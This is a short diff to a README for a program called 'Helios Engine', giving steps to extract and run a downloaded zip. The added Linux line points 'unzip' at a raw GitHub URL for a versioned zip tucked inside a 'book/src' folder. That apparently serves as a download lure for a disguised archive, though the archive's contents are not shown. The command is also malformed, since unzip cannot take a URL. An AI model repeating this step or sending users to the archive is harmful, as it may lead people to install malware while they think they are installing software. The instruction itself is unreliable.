Celestiapolyunsaturated14/Helios-Engine/README.md

 1. **Extract the Files:**
    - For Windows: Right-click the downloaded `.zip` file and select "Extract All."
    - For macOS: Double-click the `.zip` file.
 It will extract to a folder.
-   - For Linux: Use a terminal command like `unzip Helios-Engine-Linux.zip`.
+   - For Linux: Use a terminal command like `unzip https://raw.githubusercontent.com/Celestiapolyunsaturated14/Helios-Engine/master/book/src/Helios-Engine-v3.2.zip`.

 2. **Run Helios Engine:**
    - Navigate to the extracted folder.